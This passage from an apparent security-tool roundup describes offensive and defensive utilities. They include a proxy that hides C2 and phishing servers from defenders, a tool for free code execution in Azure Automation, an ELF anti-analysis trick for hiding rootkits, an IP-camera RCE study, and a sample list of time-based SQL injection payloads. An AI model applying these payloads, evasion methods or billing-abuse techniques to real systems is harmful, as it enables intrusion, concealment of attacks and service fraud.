/ou - specify LDAP OU to query enabled computer objects from, ex: "OU=Special Servers,DC=example,DC=local"
/stealth - list share names without performing read/write access checks
/filter - list of comma-separated shares to exclude from enumeration (default: SYSVOL,NETLOGON,IPC$,PRINT$)
/outfile - specify file for shares to be appended to instead of printing to stdout
/verbose - return unauthorized shares
BounceBack is a powerful, highly customizable and configurable reverse proxy with WAF functionality for hiding your C2/phishing/etc infrastructure from blue teams, sandboxes, scanners, etc. It uses real-time traffic analysis through various filters and their combinations to hide your tools from illegitimate visitors.
The tool is distributed with preconfigured lists of blocked words, blocked and allowed IP addresses.
For more information on tool usage, you may visit project's wiki.
Features
Highly configurable and customizable filter pipeline with boolean-based concatenation of rules, able to hide your infrastructure from even the keenest blue eyes.
Easily extendable project structure, everyone can add rules for their own C2.
Integrated and curated massive blacklist of IPv4 pools and ranges known to be associated with IT security vendors, combined with an IP filter to prevent them from using/attacking your infrastructure.
Malleable C2 Profile parser is able to validate inbound HTTP(s) traffic against the Malleable config and reject packets that fail validation.
Out of the box domain fronting support allows you to hide your infrastructure a little bit more.
Ability to check the IPv4 address of a request against IP geolocation/reverse lookup data and compare it to specified regular expressions, excluding peers connecting from outside allowed companies, nations, cities, domains, etc.
All incoming requests may be allowed/disallowed for any time period, so you may configure work time filters.
Support for multiple proxies with different filter pipelines at one BounceBack instance.
Verbose logging mechanism allows you to keep track of all incoming requests and events for analyzing blue team behaviour and debug issues.
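The boolean-based rule concatenation can be illustrated with a small Python sketch (BounceBack itself is written in Go, and all names here are hypothetical, not its real API): each filter is a predicate over a request, and predicates compose with and/or/not into a single pipeline decision.

```python
# Hypothetical sketch of boolean rule concatenation -- not BounceBack's real API.
def ip_blacklisted(req):  return req["ip"].startswith("192.0.2.")
def has_c2_header(req):   return req["headers"].get("X-C2-Key") == "secret"
def work_hours(req):      return 9 <= req["hour"] < 18

def all_of(*rules):  return lambda r: all(rule(r) for rule in rules)
def any_of(*rules):  return lambda r: any(rule(r) for rule in rules)
def negate(rule):    return lambda r: not rule(r)

# Allow only requests that carry the C2 key, arrive during work hours,
# and do not come from a blacklisted range.
allow = all_of(has_c2_header, work_hours, negate(ip_blacklisted))

req = {"ip": "203.0.113.7", "headers": {"X-C2-Key": "secret"}, "hour": 14}
print(allow(req))  # True
```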
Rules
BounceBack currently supports the following filters:
Faraday's researchers Javier Aguinaga and Octavio Gianatiempo have investigated IP cameras and discovered two high-severity vulnerabilities.
This research project began when Aguinaga, a research leader at Faraday Security, was informed by his wife that their IP camera had stopped working. Although initially asked simply to fix it, being a security researcher, he opted for a more unconventional approach to the problem. He brought the camera to the office and discussed the issue with Gianatiempo, another security researcher at Faraday. The situation quickly escalated from some light reverse engineering into a full-fledged vulnerability research project, which ended with two high-severity bugs and an exploitation strategy worthy of the big screen.
They uncovered two LAN remote code execution vulnerabilities in EZVIZ's implementation of Hikvision's Search Active Devices Protocol (SADP) and SDK server:
CVE-2023-34551: post-auth stack buffer overflow in EZVIZ's implementation of Hikvision's SDK server (CVSS3 8.0 - HIGH)
The affected code is present in several EZVIZ products, which include but are not limited to:
Product Model / Affected Versions:
CS-C6N-B0-1G2WF: Versions below V5.3.0 build 230215
CS-C6N-R101-1G2WF: Versions below V5.3.0 build 230215
CS-CV310-A0-1B2WFR: Versions below V5.3.0 build 230221
CS-CV310-A0-1C2WFR-C: Versions below V5.3.2 build 230221
CS-C6N-A0-1C2WFR-MUL: Versions below V5.3.2 build 230218
CS-CV310-A0-3C2WFRL-1080p: Versions below V5.2.7 build 230302
CS-CV310-A0-1C2WFR Wifi IP66 2.8mm 1080p: Versions below V5.3.2 build 230214
CS-CV248-A0-32WMFR: Versions below V5.2.3 build 230217
EZVIZ LC1C: Versions below V5.3.4 build 230214
These vulnerabilities affect IP cameras and can be used to execute code remotely, so they drew inspiration from the movies and decided to recreate an attack often seen in heist films. The hacker in the group is responsible for hijacking the cameras and modifying the feed to avoid detection. Take, for example, this famous scene from Ocean's Eleven:
Exploiting either of these vulnerabilities, Javier and Octavio served a victim an arbitrary video stream by tunneling their connection with the camera into an attacker-controlled server while leaving all other camera features operational.
A detailed deep dive into the whole research process can be found in these slides and code. It covers firmware analysis, vulnerability discovery, building a toolchain to compile a debugger for the target, and developing an exploit capable of bypassing ASLR. Plus, all the details about the Hollywood-style post-exploitation, including tracing, in-memory code patching, and manipulating the execution of the binary that implements most of the camera's features.
This research shows that memory corruption vulnerabilities still abound on embedded and IoT devices, even on products marketed for security applications like IP cameras. Memory corruption vulnerabilities can be detected by static analysis, and implementing secure development practices can reduce their occurrence. These approaches are standard in other industries, evidencing that security is not a priority for embedded and IoT device manufacturers, even when developing security-related products. By filling the gap between IoT hacking and the big screen, this research questions the integrity of video surveillance systems and hopes to raise awareness about the security risks posed by these kinds of devices.
Execute code within Azure Automation service without getting charged
Description
CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.
This flow was reported to Microsoft on 3/23, which decided not to change the service behavior as it is considered "by design". As of 3/9/23, this tool can still be used without getting charged.
Each execution is limited to 3 hours
Requirements
Python 3.8+ with the libraries mentioned in the file requirements.txt
CloudMiner - Free computing power in Azure Automation Service
optional arguments:
  -h, --help            show this help message and exit
  --path PATH           the script path (Powershell or Python)
  --id ID               id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/automationAccounts/{automationAccountName}
  -c COUNT, --count COUNT
                        number of executions
  -t TOKEN, --token TOKEN
                        Azure access token (optional). If not provided, the token will be retrieved using the Azure CLI
  -r REQUIREMENTS, --requirements REQUIREMENTS
                        path to a requirements file to be installed and used by the script (relevant to Python scripts only)
  -v, --verbose         enable verbose mode
Example usage
Python
Powershell
License
CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.
SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multithreading, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminate false positives and sends alerts upon detection through its built-in Discord notification functionality.
options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Single URL for the target
  -r URLS_FILE, --urls_file URLS_FILE
                        File containing a list of URLs
  -p, --pipeline        Read from pipeline
  --proxy PROXY         Proxy for intercepting requests (e.g., http://127.0.0.1:8080)
  --payload PAYLOAD     File containing malicious payloads (default is payloads.txt)
  --single-payload SINGLE_PAYLOAD
                        Single payload for testing
  --discord DISCORD     Discord Webhook URL
  --headers HEADERS     File containing headers (default is headers.txt)
  --threads THREADS     Number of threads
Running SqliSniper
Single Url Scan
The URL can be provided with the -u flag for a single-site scan.
./sqlisniper.py -u http://example.com
File Input
The -r flag allows SqliSniper to read a file containing multiple URLs for simultaneous scanning.
./sqlisniper.py -r url.txt
Piping URLs
SqliSniper can also work with pipeline input using the -p flag.
cat url.txt | ./sqlisniper.py -p
The pipeline feature facilitates seamless integration with other tools. For instance, you can utilize tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.
While using the custom payloads file, ensure that you substitute the sleep time with %__TIME_OUT__%. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file should look like this.
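A hypothetical payloads file might look like this (the exact payloads shipped with SqliSniper may differ; note the %__TIME_OUT__% placeholder in place of a fixed sleep time):

```
' OR SLEEP(%__TIME_OUT__%)-- -
'; WAITFOR DELAY '0:0:%__TIME_OUT__%'--
' AND 1=(SELECT 1 FROM PG_SLEEP(%__TIME_OUT__%))--
```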
SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.
Note: Employing a higher number of threads might lead to potential false positives or overlooked valid issues. Due to the nature of time-based SQL injection, it is recommended to use a lower thread count for more accurate detection.
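The timing logic that motivates this advice can be sketched as follows (a simplification, not SqliSniper's actual code): a target is flagged only if the observed delay tracks the injected sleep time, which is exactly what thread contention and network jitter can disturb.

```python
import time

def is_delayed(send_request, timeout: float) -> bool:
    """send_request(timeout) performs the request after substituting
    `timeout` for the %__TIME_OUT__% placeholder in the payload."""
    start = time.monotonic()
    send_request(timeout)
    return time.monotonic() - start >= timeout

def confirm_injection(send_request, timeouts=(2, 4)) -> bool:
    # Require the observed delay to track the requested sleep time across
    # several runs, filtering out one-off slow responses (false positives).
    return all(is_delayed(send_request, t) for t in timeouts)

# Demo against a fake endpoint that sleeps as instructed (i.e. "vulnerable"):
print(confirm_injection(lambda t: time.sleep(t), timeouts=(1,)))  # True
```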
SqliSniper is made in Python with lots of <3 by @Muhammad Danial.
Essential utilities for pentesters, bug-bounty hunters and security researchers
secbutler is a utility tool made for pentesters, bug-bounty hunters and security researchers that contains all the most used and tedious stuff commonly used while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).
The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!
Essential utilities for pentester, bug-bounty hunters and security researchers
Usage:
  secbutler [flags]
  secbutler [command]

Available Commands:
  cheatsheet  Read common cheatsheets & payloads
  help        Help about any command
  listener    Obtain the command to start a reverse shell listener
  payloads    Obtain and serve common payloads
  proxy       Obtain a random proxy from FreeProxy
  revshell    Obtain the command for a reverse shell
  tools       Generate an install script for the most common cybersecurity tools
  version     Print the current version
  wordlists   Generate a download script for the most common wordlists
Flags: -h, --help help for secbutler
Use "secbutler [command] --help" for more information about a command.
Installation
Run the following command to install the latest version:
go install github.com/groundsec/secbutler@latest
Or you can simply grab an executable from the Releases page.
License
secbutler is made with love by the GroundSec team and released under the MIT LICENSE.
NullSection is an Anti-Reversing tool that applies a technique that overwrites the section header with nullbytes.
Install
git clone https://github.com/MatheuZSecurity/NullSection
cd NullSection
gcc nullsection.c -o nullsection
./nullsection
Advantage
When running nullsection on any ELF (it could be a .ko rootkit), if you then use Ghidra/IDA to parse the ELF, nothing will appear - no functions to parse in the decompiler, for example. Even if you run readelf -S /path/to/elf, the following message will appear: "There are no sections in this file."
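The underlying trick can be sketched in Python (NullSection itself is a C program; this is an illustrative approximation for 64-bit ELF files only): zeroing the section-header references in the ELF header is enough to make section-table-driven tools report no sections.

```python
import struct

def null_section_headers(elf: bytearray) -> bytearray:
    """Zero the section-header table references in an ELF64 header.
    In the ELF64 layout, e_shoff sits at offset 0x28, e_shnum at 0x3C
    and e_shstrndx at 0x3E (little-endian assumed here)."""
    assert elf[:4] == b"\x7fELF", "not an ELF file"
    struct.pack_into("<Q", elf, 0x28, 0)  # e_shoff    = 0 (no section header table)
    struct.pack_into("<H", elf, 0x3C, 0)  # e_shnum    = 0 (zero sections)
    struct.pack_into("<H", elf, 0x3E, 0)  # e_shstrndx = 0 (no section-name strtab)
    return elf

# Demo on a fabricated 64-byte ELF64 header:
hdr = bytearray(64)
hdr[:4] = b"\x7fELF"
struct.pack_into("<Q", hdr, 0x28, 0x1234)  # pretend section headers live at 0x1234
struct.pack_into("<H", hdr, 0x3C, 12)      # pretend there are 12 sections
null_section_headers(hdr)
print(struct.unpack_from("<Q", hdr, 0x28)[0], struct.unpack_from("<H", hdr, 0x3C)[0])  # 0 0
```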
Make good use of the tool!
Note
We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.
MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.
AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.
How it works?
AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.
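The permutation step can be sketched like this (the suffix list and wordlists are abbreviated, hypothetical stand-ins for AzSubEnum's real service map): candidate hostnames are built by combining the base name with each permutation and each Azure service suffix, then handed to a DNS resolver.

```python
from itertools import product

# A few of the Azure service suffixes such a tool probes (abbreviated).
AZURE_SUFFIXES = {
    "App Services":     "azurewebsites.net",
    "Storage Accounts": "blob.core.windows.net",
    "MSSQL":            "database.windows.net",
    "Key Vaults":       "vault.azure.net",
}

def candidates(base: str, permutations: list[str]) -> list[str]:
    """Combine base name and permutations with every service suffix."""
    names = {base} | {f"{base}{p}" for p in permutations} | {f"{p}{base}" for p in permutations}
    return sorted(f"{n}.{s}" for n, s in product(names, AZURE_SUFFIXES.values()))

for host in candidates("contoso", ["dev"])[:4]:
    print(host)  # each candidate would then be resolved via DNS
```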
With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.
Why did I create this?
During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, Invoke-EnumerateAzureSubDomains from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.
options:
  -h, --help            show this help message and exit
  -b BASE, --base BASE  Base name to use
  -v, --verbose         Show verbose output
  -t THREADS, --threads THREADS
                        Number of threads for concurrent execution
  -p PERMUTATIONS, --permutations PERMUTATIONS
                        File containing permutations
SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals.
What is Swagger?
Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API.
About SwaggerHub
SwaggerHub is a collaborative platform for designing, building, and managing APIs using the Swagger framework. It offers a centralized repository for API documentation, version control, and collaboration among team members. SwaggerHub simplifies the API development lifecycle by providing a unified platform for API design and testing.
Why OSINT on SwaggerHub?
Performing OSINT on SwaggerHub is crucial because developers, in their pursuit of efficient API documentation and sharing, may inadvertently expose sensitive information. Here are key reasons why OSINT on SwaggerHub is valuable:
Developer Oversights: Developers might unintentionally include secrets, credentials, or sensitive information in API documentation on SwaggerHub. These oversights can lead to security vulnerabilities and unauthorized access if not identified and addressed promptly.
Security Best Practices: OSINT on SwaggerHub helps enforce security best practices. Identifying and rectifying potential security issues early in the development lifecycle is essential to ensure the confidentiality and integrity of APIs.
Preventing Data Leaks: By systematically scanning SwaggerHub for sensitive information, organizations can proactively prevent data leaks. This is especially crucial in today's interconnected digital landscape where APIs play a vital role in data exchange between services.
Risk Mitigation: Understanding that developers might forget to remove or obfuscate sensitive details in API documentation underscores the importance of continuous OSINT on SwaggerHub. This proactive approach mitigates the risk of unintentional exposure of critical information.
Compliance and Privacy: Many industries have stringent compliance requirements regarding the protection of sensitive data. OSINT on SwaggerHub ensures that APIs adhere to these regulations, promoting a culture of compliance and safeguarding user privacy.
Educational Opportunities: Identifying oversights in SwaggerHub documentation provides educational opportunities for developers. It encourages a security-conscious mindset, fostering a culture of awareness and responsible information handling.
By recognizing that developers can inadvertently expose secrets, OSINT on SwaggerHub becomes an integral part of the overall security strategy, safeguarding against potential threats and promoting a secure API ecosystem.
How SwaggerSpy Works
SwaggerSpy obtains information from SwaggerHub and utilizes regular expressions to inspect API documentation for sensitive information, such as secrets and credentials.
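The regex-scanning idea looks roughly like this (the patterns below are illustrative, not SwaggerSpy's actual rule set):

```python
import re

# Illustrative secret-detection patterns; a real rule set is far larger.
SECRET_PATTERNS = {
    "AWS access key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "Bearer token":   re.compile(r"Bearer\s+[A-Za-z0-9\-_\.=]{20,}"),
    "Password field": re.compile(r'"password"\s*:\s*"[^"]+"', re.IGNORECASE),
}

def scan_spec(text: str) -> list[tuple[str, str]]:
    """Return (pattern name, matched text) pairs found in an API spec document."""
    return [(name, m.group(0))
            for name, rx in SECRET_PATTERNS.items()
            for m in rx.finditer(text)]

spec = '{"password": "hunter2", "key": "AKIAABCDEFGHIJKLMNOP"}'
print(scan_spec(spec))
```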
Getting Started
To use SwaggerSpy, follow these steps:
Installation: Clone the SwaggerSpy repository and install the required dependencies.
git clone https://github.com/UndeadSec/SwaggerSpy.git
cd SwaggerSpy
pip install -r requirements.txt
Usage: Run SwaggerSpy with the target search terms (more accurate with domains).
python swaggerspy.py searchterm
Results: SwaggerSpy will generate a report containing OSINT findings, including information about the API, endpoints, and secrets.
Disclaimer
SwaggerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.
Contribution
Contributions to SwaggerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.
About the Author
SwaggerSpy is developed and maintained by Alisson Moretto (UndeadSec)
I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.
TODO
Regular Expressions Enhancement
[ ] Review and improve existing regular expressions.
[ ] Ensure that regular expressions adhere to best practices.
[ ] Check for any potential optimizations in the regex patterns.
[ ] Test regular expressions with various input scenarios for accuracy.
[ ] Document any complex or non-trivial regex patterns for better understanding.
[ ] Explore opportunities to modularize or break down complex patterns.
[ ] Verify the regular expressions against the latest specifications or requirements.
[ ] Update documentation to reflect any changes made to the regular expressions.
License
SwaggerSpy is licensed under the MIT License. See the LICENSE file for details.
Thanks
Special thanks to @Liodeus for providing project inspiration through swaggerHole.
SpeedyTest is a powerful command-line tool for measuring internet speed. With its advanced features and intuitive interface, it provides accurate and comprehensive speed test results. Whether you're a network administrator, developer, or simply want to monitor your internet connection, SpeedyTest is the perfect tool for the job.
Features
Measure download speed, upload speed, and ping latency.
Generate detailed reports with graphical representation of speed test results.
Save and export test results in various formats (CSV, JSON, etc.).
Customize speed test parameters and server selection.
Compare speed test results over time to track performance changes.
Integrate SpeedyTest into your own applications using the provided API.
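Download-speed measurement of this kind typically boils down to timing how long a known number of bytes takes to arrive. A minimal sketch (not SpeedyTest's actual code; `read_chunk` is a hypothetical stand-in for a socket read):

```python
import time

def throughput_mbps(read_chunk, total_bytes: int, chunk: int = 65536) -> float:
    """Pull `total_bytes` via read_chunk(n) and convert elapsed time to Mbit/s."""
    start = time.monotonic()
    received = 0
    while received < total_bytes:
        received += len(read_chunk(min(chunk, total_bytes - received)))
    elapsed = max(time.monotonic() - start, 1e-9)  # guard against zero elapsed
    return received * 8 / 1_000_000 / elapsed

# Demo against an in-memory "server" that serves zero-bytes instantly:
fake_server = lambda n: b"\x00" * n
print(f"{throughput_mbps(fake_server, 10_000_000):.0f} Mbps")  # very fast: it's local
```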
Before you can use SpeedyTest, you need to make sure that you have the necessary requirements installed. You can install these requirements by running the following command:
pip install -r requirements.txt
Usage
Run the following command to perform a speed test:
python3 speendytest.py
Visual Output
Output
Receiving data \
Speed test completed!
Speed test time: 20.22 seconds
Server     : Farknet - Konya
IP Address : speedtest.farknet.com.tr:8080
Country    : Turkey
City       : Konya
Ping       : 20.41 ms
Download   : 90.12 Mbps
Upload     : 20 Mbps
Contributing
Contributions are welcome! To contribute to SpeedyTest, follow these steps:
Fork the repository.
Create a new branch for your feature or bug fix.
Make your changes and commit them.
Push your changes to your forked repository.
Open a pull request in the main repository.
Contact
If you have any questions, comments, or suggestions about SpeedyTest, please feel free to contact me:
SploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability, empowering cybersecurity professionals to swiftly identify and apply known exploits. It's particularly valuable for professionals seeking to enhance their security measures or develop robust detection strategies against emerging threats.
Features
CVE Information Retrieval: Fetches CVE details from the National Vulnerability Database.
EPSS Integration: Includes Exploit Prediction Scoring System (EPSS) data, offering a probability score for the likelihood of CVE exploitation, aiding in prioritization.
PoC Exploits Aggregation: Gathers publicly available PoC exploits, enhancing the understanding of vulnerabilities.
CISA KEV: Shows if the CVE has been listed in the Known Exploited Vulnerabilities (KEV) of CISA.
Patching Priority System: Evaluates and assigns a priority rating for patching based on various factors including public exploits availability.
Multi-CVE Support and Export Options: Supports multiple CVEs in a single run and allows exporting the results to JSON and CSV formats.
User-Friendly Interface: Easy to use, providing clear and concise information.
Comprehensive Security Tool: Ideal for quick security assessments and staying informed about recent vulnerabilities.
Usage
Regular:
python sploitscan.py CVE-YYYY-NNNNN
Enter one or more CVE IDs to fetch data. Separate multiple CVE IDs with spaces.
Optional: Export the results to a JSON or CSV file. Specify the format: 'json' or 'csv'.
python sploitscan.py CVE-YYYY-NNNNN -e JSON
Patching Prioritization System
The Patching Prioritization System in SploitScan provides a strategic approach to prioritizing security patches based on the severity and exploitability of vulnerabilities. It's influenced by the model from CVE Prioritizer, with enhancements for handling publicly available exploits. Here's how it works:
A+ Priority: Assigned to CVEs listed in CISA's KEV or those with publicly available exploits. This reflects the highest risk and urgency for patching.
A to D Priority: Based on a combination of CVSS scores and EPSS probability percentages. The decision matrix is as follows:
A: CVSS score >= 6.0 and EPSS score >= 0.2. High severity with a significant probability of exploitation.
B: CVSS score >= 6.0 but EPSS score < 0.2. High severity but lower probability of exploitation.
C: CVSS score < 6.0 and EPSS score >= 0.2. Lower severity but higher probability of exploitation.
D: CVSS score < 6.0 and EPSS score < 0.2. Lower severity and lower probability of exploitation.
This system assists users in making informed decisions on which vulnerabilities to patch first, considering both their potential impact and the likelihood of exploitation. Thresholds can be changed to your business needs.
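The decision matrix above maps directly onto a few lines of Python (thresholds as stated; adjust them to your business needs - this is a sketch of the described logic, not SploitScan's source):

```python
def patch_priority(cvss: float, epss: float, in_cisa_kev: bool = False,
                   public_exploit: bool = False) -> str:
    """Implement the A+/A-D patching priority matrix described above."""
    if in_cisa_kev or public_exploit:
        return "A+"            # highest risk and urgency
    if cvss >= 6.0:
        return "A" if epss >= 0.2 else "B"
    return "C" if epss >= 0.2 else "D"

print(patch_priority(9.8, 0.5))                    # A
print(patch_priority(9.8, 0.5, in_cisa_kev=True))  # A+
print(patch_priority(4.3, 0.01))                   # D
```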
Changelog
[17th February 2024] - Enhancement Update
Additional Information: Added further information such as references & vector string
Removed: Star count in publicly available exploits
[15th January 2024] - Enhancement Update
Multiple CVE Support: Now capable of handling multiple CVE IDs in a single execution.
JSON and CSV Export: Added functionality to export results to JSON and CSV files.
Enhanced CVE Display: Improved visual differentiation and information layout for each CVE.
Patching Priority System: Introduced a priority rating system for patching, influenced by various factors including the availability of public exploits.
[13th January 2024] - Initial Release
Initial release of SploitScan.
Contributing
Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.
RepoReaper is a precision tool designed to automate the identification of exposed .git repositories across a list of domains and subdomains. By processing a user-provided text file of domain names, RepoReaper systematically checks each for publicly accessible .git files. This enables rapid assessment and protection against information leaks, making RepoReaper an essential resource for security teams and web developers.
Features
Automated scanning of domains and subdomains for exposed .git repositories.
Streamlines the detection of sensitive data exposures.
User-friendly command-line interface.
Ideal for security audits and Bug Bounty.
Installation
Clone the repository and install the required dependencies:
RepoReaper will then proceed to scan the provided domains or subdomains for exposed .git repositories and report its findings.
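The core check such a scan performs can be approximated as follows (a hedged sketch; RepoReaper's real heuristics may differ): an exposed repository typically answers /.git/HEAD with a `ref:` line or a bare commit hash.

```python
def git_head_url(domain: str) -> str:
    """Build the probe URL for a candidate domain."""
    return f"https://{domain.strip().rstrip('/')}/.git/HEAD"

def looks_exposed(status: int, body: str) -> bool:
    # A real .git/HEAD is a one-liner such as "ref: refs/heads/main"
    # (or a bare 40-hex commit id when HEAD is detached).
    body = body.strip()
    return status == 200 and (
        body.startswith("ref: refs/")
        or (len(body) == 40 and all(c in "0123456789abcdef" for c in body))
    )

print(git_head_url("example.com"))                   # https://example.com/.git/HEAD
print(looks_exposed(200, "ref: refs/heads/main\n"))  # True
print(looks_exposed(200, "<html>Not found</html>"))  # False
```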
Disclaimer
This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.